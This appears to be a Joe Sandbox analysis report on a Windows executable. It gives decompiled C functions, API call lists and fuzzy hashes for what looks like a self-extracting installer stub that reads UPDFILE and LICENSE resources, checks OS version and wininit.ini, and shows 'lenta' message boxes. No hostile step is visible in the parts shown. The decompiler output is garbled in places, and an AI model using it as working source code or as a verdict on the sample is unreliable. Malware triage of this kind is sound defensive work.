                              0x010e4429
                              0x010e4437
                              0x010e4444
                              0x010e4447
                              0x010e444d
                              0x010e4454
                              0x010e445b
                              0x010e4460
                              0x010e4461
                              0x010e4467
                              0x010e446f
                              0x010e4473
                              0x010e4473
                              0x010e4463
                              0x010e4463
                              0x010e4463
                              0x010e447a
                              0x010e4481
                              0x010e4484
                              0x010e448a
                              0x010e4492
                              0x010e4496
                              0x010e4496
                              0x010e4486
                              0x010e4486
                              0x010e4486
                              0x010e44b8

                              APIs
                              • GetWindowRect.USER32(?,?), ref: 010E43F1
                              • GetWindowRect.USER32(00000000,?), ref: 010E440B
                              • GetDC.USER32(?), ref: 010E4423
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 010E442E
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010E443A
                              • ReleaseDC.USER32(?,00000000), ref: 010E4447
                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010E44A2
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceRect$Release
                              • String ID:
                              • API String ID: 2212493051-0
                              • Opcode ID: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                              • Instruction ID: ecde2537c1f88f6fa82452bbc0cac5a42fa33f7532612b1cf4cf0980da97df34
                              • Opcode Fuzzy Hash: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                              • Instruction Fuzzy Hash: 18313872F00119AFCB24CEB9D9889EEBBF5EB89310F154169F845F7244DA35AD058B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E010E6298(intOrPtr __ecx, intOrPtr* __edx) {
                              				signed int _v8;
                              				char _v28;
                              				intOrPtr _v32;
                              				struct HINSTANCE__* _v36;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				struct HRSRC__* _t21;
                              				intOrPtr _t26;
                              				void* _t30;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr* _t40;
                              				void* _t41;
                              				intOrPtr* _t44;
                              				intOrPtr* _t45;
                              				void* _t47;
                              				signed int _t50;
                              				struct HINSTANCE__* _t51;
                              
                              				_t44 = __edx;
                              				_t16 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t16 ^ _t50;
                              				_t46 = 0;
                              				_v32 = __ecx;
                              				_v36 = 0;
                              				_t36 = 1;
                              				E010E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                              				while(1) {
                              					_t51 = _t51 + 0x10;
                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                              					if(_t21 == 0) {
                              						break;
                              					}
                              					_t45 = LockResource(LoadResource(_t46, _t21));
                              					if(_t45 == 0) {
                              						 *0x10e9124 = 0x80070714;
                              						_t36 = _t46;
                              					} else {
                              						_t5 = _t45 + 8; // 0x8
                              						_t44 = _t5;
                              						_t40 = _t44;
                              						_t6 = _t40 + 1; // 0x9
                              						_t47 = _t6;
                              						do {
                              							_t26 =  *_t40;
                              							_t40 = _t40 + 1;
                              						} while (_t26 != 0);
                              						_t41 = _t40 - _t47;
                              						_t46 = _t51;
                              						_t7 = _t41 + 1; // 0xa
                              						 *0x10ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                              						_t30 = _v32();
                              						if(_t51 != _t51) {
                              							asm("int 0x29");
                              						}
                              						_push(_t45);
                              						if(_t30 == 0) {
                              							_t36 = 0;
                              							FreeResource(??);
                              						} else {
                              							FreeResource();
                              							_v36 = _v36 + 1;
                              							E010E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                              							_t46 = 0;
                              							continue;
                              						}
                              					}
                              					L12:
                              					return E010E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                              				}
                              				goto L12;
                              			}






















                              0x010e6298
                              0x010e62a0
                              0x010e62a7
                              0x010e62ad
                              0x010e62af
                              0x010e62bb
                              0x010e62c3
                              0x010e62c4
                              0x010e633b
                              0x010e633b
                              0x010e6345
                              0x010e634d
                              0x00000000
                              0x00000000
                              0x010e62da
                              0x010e62de
                              0x010e635f
                              0x010e6369
                              0x010e62e0
                              0x010e62e0
                              0x010e62e0
                              0x010e62e3
                              0x010e62e5
                              0x010e62e5
                              0x010e62e8
                              0x010e62e8
                              0x010e62ea
                              0x010e62eb
                              0x010e62ef
                              0x010e62f1
                              0x010e62f3
                              0x010e6302
                              0x010e6308
                              0x010e630d
                              0x010e6314
                              0x010e6314
                              0x010e6316
                              0x010e6319
                              0x010e6355
                              0x010e6357
                              0x010e631b
                              0x010e631b
                              0x010e6331
                              0x010e6334
                              0x010e6339
                              0x00000000
                              0x010e6339
                              0x010e6319
                              0x010e636b
                              0x010e637d
                              0x010e637d
                              0x00000000

                              APIs
                                • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62CD
                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62D4
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E631B
                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010E6345
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E6357
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                              • String ID: UPDFILE%lu
                              • API String ID: 2922116661-2329316264
                              • Opcode ID: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                              • Instruction ID: fa70b6d9081c06f71061de806adb5c9ced505f12710a3fc29d87007f8aec0191
                              • Opcode Fuzzy Hash: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                              • Instruction Fuzzy Hash: 3C21D875B00219AFDB209F66EC499FE7BF8FB48B54F004159F982A7201D73B99018BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E681F(void* __ebx) {
                              				signed int _v8;
                              				char _v20;
                              				struct _OSVERSIONINFOA _v168;
                              				void* _v172;
                              				int* _v176;
                              				int _v180;
                              				int _v184;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				long _t31;
                              				signed int _t35;
                              				void* _t36;
                              				intOrPtr _t41;
                              				signed int _t44;
                              
                              				_t36 = __ebx;
                              				_t19 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t19 ^ _t44;
                              				_t41 =  *0x10e81d8; // 0xfffffffe
                              				_t43 = 0;
                              				_v180 = 0xc;
                              				_v176 = 0;
                              				if(_t41 == 0xfffffffe) {
                              					 *0x10e81d8 = 0;
                              					_v168.dwOSVersionInfoSize = 0x94;
                              					if(GetVersionExA( &_v168) == 0) {
                              						L12:
                              						_t41 =  *0x10e81d8; // 0xfffffffe
                              					} else {
                              						_t41 = 1;
                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                              							goto L12;
                              						} else {
                              							_t31 = RegQueryValueExA(_v172, 0x10e1140, 0,  &_v184,  &_v20,  &_v180);
                              							_t43 = _t31;
                              							RegCloseKey(_v172);
                              							if(_t31 != 0) {
                              								goto L12;
                              							} else {
                              								_t40 =  &_v176;
                              								if(E010E66F9( &_v20,  &_v176) == 0) {
                              									goto L12;
                              								} else {
                              									_t35 = _v176 & 0x000003ff;
                              									if(_t35 == 1 || _t35 == 0xd) {
                              										 *0x10e81d8 = _t41;
                              									} else {
                              										goto L12;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E010E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                              			}


















                              0x010e681f
                              0x010e682a
                              0x010e6831
                              0x010e6836
                              0x010e683c
                              0x010e683e
                              0x010e6848
                              0x010e6851
                              0x010e685d
                              0x010e6864
                              0x010e6876
                              0x010e693a
                              0x010e693a
                              0x010e687c
                              0x010e687e
                              0x010e6885
                              0x00000000
                              0x010e68d6
                              0x010e68f4
                              0x010e6900
                              0x010e6902
                              0x010e690a
                              0x00000000
                              0x010e690c
                              0x010e690c
                              0x010e691c
                              0x00000000
                              0x010e691e
                              0x010e6924
                              0x010e692b
                              0x010e6932
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e692b
                              0x010e691c
                              0x010e690a
                              0x010e6885
                              0x010e6876
                              0x010e6951

                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                              • GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                              • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                              • RegCloseKey.ADVAPI32(?), ref: 010E6902
                                • Part of subcall function 010E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010E691A), ref: 010E6741
                              Strings
                              • Control Panel\Desktop\ResourceLocale, xrefs: 010E68C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                              • String ID: Control Panel\Desktop\ResourceLocale
                              • API String ID: 3346862599-1109908249
                              • Opcode ID: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                              • Instruction ID: 1aafdf3dd6fe0cc0fc6f56041b3108577f3b046d595df7e97bad8652fd736277
                              • Opcode Fuzzy Hash: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                              • Instruction Fuzzy Hash: 59318231A40218DFDB31CB17EC48BEA7BFCEB55764F0041D5E989AA240D73699858F51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E3A3F(void* __eflags) {
                              				void* _t3;
                              				void* _t9;
                              				CHAR* _t16;
                              
                              				_t16 = "LICENSE";
                              				_t1 = E010E468F(_t16, 0, 0) + 1; // 0x1
                              				_t3 = LocalAlloc(0x40, _t1);
                              				 *0x10e8d4c = _t3;
                              				if(_t3 != 0) {
                              					_t19 = _t16;
                              					if(E010E468F(_t16, _t3, _t28) != 0) {
                              						if(lstrcmpA( *0x10e8d4c, "<None>") == 0) {
                              							LocalFree( *0x10e8d4c);
                              							L9:
                              							 *0x10e9124 = 0;
                              							return 1;
                              						}
                              						_t9 = E010E6517(_t19, 0x7d1, 0, E010E3100, 0, 0);
                              						LocalFree( *0x10e8d4c);
                              						if(_t9 != 0) {
                              							goto L9;
                              						}
                              						 *0x10e9124 = 0x800704c7;
                              						L2:
                              						return 0;
                              					}
                              					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree( *0x10e8d4c);
                              					 *0x10e9124 = 0x80070714;
                              					goto L2;
                              				}
                              				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0x10e9124 = E010E6285();
                              				goto L2;
                              			}






                              0x010e3a46
                              0x010e3a57
                              0x010e3a5d
                              0x010e3a63
                              0x010e3a6a
                              0x010e3a91
                              0x010e3a9a
                              0x010e3ad8
                              0x010e3b13
                              0x010e3b19
                              0x010e3b1b
                              0x00000000
                              0x010e3b21
                              0x010e3ae7
                              0x010e3af4
                              0x010e3afc
                              0x00000000
                              0x00000000
                              0x010e3afe
                              0x010e3a87
                              0x00000000
                              0x010e3a87
                              0x010e3aa8
                              0x010e3ab3
                              0x010e3ab9
                              0x00000000
                              0x010e3ab9
                              0x010e3a78
                              0x010e3a82
                              0x00000000

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F64,?,00000002,00000000), ref: 010E3A5D
                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010E3AB3
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 010E3AD0
                              • LocalFree.KERNEL32 ref: 010E3B13
                                • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                              • LocalFree.KERNEL32(00000000,010E3100,00000000,00000000), ref: 010E3AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                              • String ID: <None>$LICENSE
                              • API String ID: 2414642746-383193767
                              • Opcode ID: 064f6ba610277a31f64ff2a8eb6c8bad93d9442d4bd7788eba85f9176e0a386e
                              • Instruction ID: 603b7f084cb65ea5b26799051bcc7c3adbbeaf6b6fe203bf7cbd40dd1d3d5ede
                              • Opcode Fuzzy Hash: 064f6ba610277a31f64ff2a8eb6c8bad93d9442d4bd7788eba85f9176e0a386e
                              • Instruction Fuzzy Hash: D9115171705201AED7346B27AC0CE5B7EE9EBD9B50B00446EB5C6DF254DA7F88008764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E24E0(void* __ebx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t7;
                              				void* _t20;
                              				long _t26;
                              				signed int _t27;
                              
                              				_t20 = __ebx;
                              				_t7 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t7 ^ _t27;
                              				_t25 = 0x104;
                              				_t26 = 0;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					E010E658A( &_v268, 0x104, "wininit.ini");
                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                              					_t25 = _lopen( &_v268, 0x40);
                              					if(_t25 != 0xffffffff) {
                              						_t26 = _llseek(_t25, 0, 2);
                              						_lclose(_t25);
                              					}
                              				}
                              				return E010E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                              			}











                              0x010e24e0
                              0x010e24eb
                              0x010e24f2
                              0x010e24f7
                              0x010e2504
                              0x010e250e
                              0x010e251d
                              0x010e252c
                              0x010e2541
                              0x010e2546
                              0x010e2553
                              0x010e2555
                              0x010e2555
                              0x010e2546
                              0x010e256c

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010E2506
                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010E252C
                              • _lopen.KERNEL32 ref: 010E253B
                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010E254C
                              • _lclose.KERNEL32(00000000), ref: 010E2555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                              • String ID: wininit.ini
                              • API String ID: 3273605193-4206010578
                              • Opcode ID: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                              • Instruction ID: 9034fc79c89149b6826f9f3278114a0c495d1395d270f6e36d586aadbc2af316
                              • Opcode Fuzzy Hash: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                              • Instruction Fuzzy Hash: BF019632700118ABD7309A669D0CEDF7FFCDB95B60F000155FA85D7144DA794A418B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E010E36EE(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v268;
                              				struct _OSVERSIONINFOA _v416;
                              				signed int _v420;
                              				signed int _v424;
                              				CHAR* _v428;
                              				CHAR* _v432;
                              				signed int _v436;
                              				CHAR* _v440;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t72;
                              				CHAR* _t77;
                              				CHAR* _t91;
                              				CHAR* _t94;
                              				int _t97;
                              				CHAR* _t98;
                              				signed char _t99;
                              				CHAR* _t104;
                              				signed short _t107;
                              				signed int _t109;
                              				short _t113;
                              				void* _t114;
                              				signed char _t115;
                              				short _t119;
                              				CHAR* _t123;
                              				CHAR* _t124;
                              				CHAR* _t129;
                              				signed int _t131;
                              				signed int _t132;
                              				CHAR* _t135;
                              				CHAR* _t138;
                              				signed int _t139;
                              
                              				_t72 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t72 ^ _t139;
                              				_v416.dwOSVersionInfoSize = 0x94;
                              				_t115 = __ecx;
                              				_t135 = 0;
                              				_v432 = __ecx;
                              				_t138 = 0;
                              				if(GetVersionExA( &_v416) != 0) {
                              					_t133 = _v416.dwMajorVersion;
                              					_t119 = 2;
                              					_t77 = _v416.dwPlatformId - 1;
                              					__eflags = _t77;
                              					if(_t77 == 0) {
                              						_t119 = 0;
                              						__eflags = 1;
                              						 *0x10e8184 = 1;
                              						 *0x10e8180 = 1;
                              						L13:
                              						 *0x10e9a40 = _t119;
                              						L14:
                              						__eflags =  *0x10e8a34 - _t138; // 0x0
                              						if(__eflags != 0) {
                              							goto L66;
                              						}
                              						__eflags = _t115;
                              						if(_t115 == 0) {
                              							goto L66;
                              						}
                              						_v428 = _t135;
                              						__eflags = _t119;
                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                              						_t11 =  &_v420;
                              						 *_t11 = _v420 & _t138;
                              						__eflags =  *_t11;
                              						_v440 = _t115;
                              						do {
                              							_v424 = _t135 * 0x18;
                              							_v436 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                              							_t91 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                              							_t123 = _v436;
                              							_t133 = 0x54d;
                              							__eflags = _t123;
                              							if(_t123 < 0) {
                              								L32:
                              								__eflags = _v420 - 1;
                              								if(_v420 == 1) {
                              									_t138 = 0x54c;
                              									L36:
                              									__eflags = _t138;
                              									if(_t138 != 0) {
                              										L40:
                              										__eflags = _t138 - _t133;
                              										if(_t138 == _t133) {
                              											L30:
                              											_v420 = _v420 & 0x00000000;
                              											_t115 = 0;
                              											_v436 = _v436 & 0x00000000;
                              											__eflags = _t138 - _t133;
                              											_t133 = _v432;
                              											if(__eflags != 0) {
                              												_t124 = _v440;
                              											} else {
                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                              												_v420 =  &_v268;
                              											}
                              											__eflags = _t124;
                              											if(_t124 == 0) {
                              												_t135 = _v436;
                              											} else {
                              												_t99 = _t124[0x30];
                              												_t135 = _t124[0x34] + 0x84 + _t133;
                              												__eflags = _t99 & 0x00000001;
                              												if((_t99 & 0x00000001) == 0) {
                              													asm("sbb ebx, ebx");
                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                              												} else {
                              													_t115 = 0x104;
                              												}
                              											}
                              											__eflags =  *0x10e8a38 & 0x00000001;
                              											if(( *0x10e8a38 & 0x00000001) != 0) {
                              												L64:
                              												_push(0);
                              												_push(0x30);
                              												_push(_v420);
                              												_push("lenta");
                              												goto L65;
                              											} else {
                              												__eflags = _t135;
                              												if(_t135 == 0) {
                              													goto L64;
                              												}
                              												__eflags =  *_t135;
                              												if( *_t135 == 0) {
                              													goto L64;
                              												}
                              												MessageBeep(0);
                              												_t94 = E010E681F(_t115);
                              												__eflags = _t94;
                              												if(_t94 == 0) {
                              													L57:
                              													0x180030 = 0x30;
                              													L58:
                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                              													__eflags = _t115 & 0x00000004;
                              													if((_t115 & 0x00000004) == 0) {
                              														__eflags = _t115 & 0x00000001;
                              														if((_t115 & 0x00000001) == 0) {
                              															goto L66;
                              														}
                              														__eflags = _t97 - 1;
                              														L62:
                              														if(__eflags == 0) {
                              															_t138 = 0;
                              														}
                              														goto L66;
                              													}
                              													__eflags = _t97 - 6;
                              													goto L62;
                              												}
                              												_t98 = E010E67C9(_t124, _t124);
                              												__eflags = _t98;
                              												if(_t98 == 0) {
                              													goto L57;
                              												}
                              												goto L58;
                              											}
                              										}
                              										__eflags = _t138 - 0x54c;
                              										if(_t138 == 0x54c) {
                              											goto L30;
                              										}
                              										__eflags = _t138;
                              										if(_t138 == 0) {
                              											goto L66;
                              										}
                              										_t135 = 0;
                              										__eflags = 0;
                              										goto L44;
                              									}
                              									L37:
                              									_t129 = _v432;
                              									__eflags = _t129[0x7c];
                              									if(_t129[0x7c] == 0) {
                              										goto L66;
                              									}
                              									_t133 =  &_v268;
                              									_t104 = E010E28E8(_t129,  &_v268, _t129,  &_v428);
                              									__eflags = _t104;
                              									if(_t104 != 0) {
                              										goto L66;
                              									}
                              									_t135 = _v428;
                              									_t133 = 0x54d;
                              									_t138 = 0x54d;
                              									goto L40;
                              								}
                              								goto L33;
                              							}
                              							__eflags = _t91;
                              							if(_t91 > 0) {
                              								goto L32;
                              							}
                              							__eflags = _t123;
                              							if(_t123 != 0) {
                              								__eflags = _t91;
                              								if(_t91 != 0) {
                              									goto L37;
                              								}
                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                              								L27:
                              								if(__eflags <= 0) {
                              									goto L37;
                              								}
                              								L28:
                              								__eflags = _t135;
                              								if(_t135 == 0) {
                              									goto L33;
                              								}
                              								_t138 = 0x54c;
                              								goto L30;
                              							}
                              							__eflags = _t91;
                              							_t107 = _v416.dwBuildNumber;
                              							if(_t91 != 0) {
                              								_t131 = _v424;
                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                              									goto L37;
                              								}
                              								goto L28;
                              							}
                              							_t132 = _t107 & 0x0000ffff;
                              							_t109 = _v424;
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                              								goto L28;
                              							}
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                              							goto L27;
                              							L33:
                              							_t135 =  &(_t135[1]);
                              							_v428 = _t135;
                              							_v420 = _t135;
                              							__eflags = _t135 - 2;
                              						} while (_t135 < 2);
                              						goto L36;
                              					}
                              					__eflags = _t77 == 1;
                              					if(_t77 == 1) {
                              						 *0x10e9a40 = _t119;
                              						 *0x10e8184 = 1;
                              						 *0x10e8180 = 1;
                              						__eflags = _t133 - 3;
                              						if(_t133 > 3) {
                              							__eflags = _t133 - 5;
                              							if(_t133 < 5) {
                              								goto L14;
                              							}
                              							_t113 = 3;
                              							_t119 = _t113;
                              							goto L13;
                              						}
                              						_t119 = 1;
                              						_t114 = 3;
                              						 *0x10e9a40 = 1;
                              						__eflags = _t133 - _t114;
                              						if(__eflags < 0) {
                              							L9:
                              							 *0x10e8184 = _t135;
                              							 *0x10e8180 = _t135;
                              							goto L14;
                              						}
                              						if(__eflags != 0) {
                              							goto L14;
                              						}
                              						__eflags = _v416.dwMinorVersion - 0x33;
                              						if(_v416.dwMinorVersion >= 0x33) {
                              							goto L14;
                              						}
                              						goto L9;
                              					}
                              					_t138 = 0x4ca;
                              					goto L44;
                              				} else {
                              					_t138 = 0x4b4;
                              					L44:
                              					_push(_t135);
                              					_push(0x10);
                              					_push(_t135);
                              					_push(_t135);
                              					L65:
                              					_t133 = _t138;
                              					E010E44B9(0, _t138);
                              					L66:
                              					return E010E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                              				}
                              			}





































                              0x010e36f9
                              0x010e3700
                              0x010e370c
                              0x010e3716
                              0x010e3718
                              0x010e371b
                              0x010e3721
                              0x010e372b
                              0x010e373d
                              0x010e3745
                              0x010e3746
                              0x010e3746
                              0x010e3749
                              0x010e37ab
                              0x010e37ad
                              0x010e37ae
                              0x010e37b3
                              0x010e37b8
                              0x010e37b8
                              0x010e37bf
                              0x010e37bf
                              0x010e37c5
                              0x00000000
                              0x00000000
                              0x010e37cb
                              0x010e37cd
                              0x00000000
                              0x00000000
                              0x010e37d5
                              0x010e37db
                              0x010e37e8
                              0x010e37ea
                              0x010e37ea
                              0x010e37ea
                              0x010e37f0
                              0x010e37f6
                              0x010e3805
                              0x010e3817
                              0x010e382b
                              0x010e3830
                              0x010e3836
                              0x010e383b
                              0x010e383d
                              0x010e38eb
                              0x010e38eb
                              0x010e38f2
                              0x010e390c
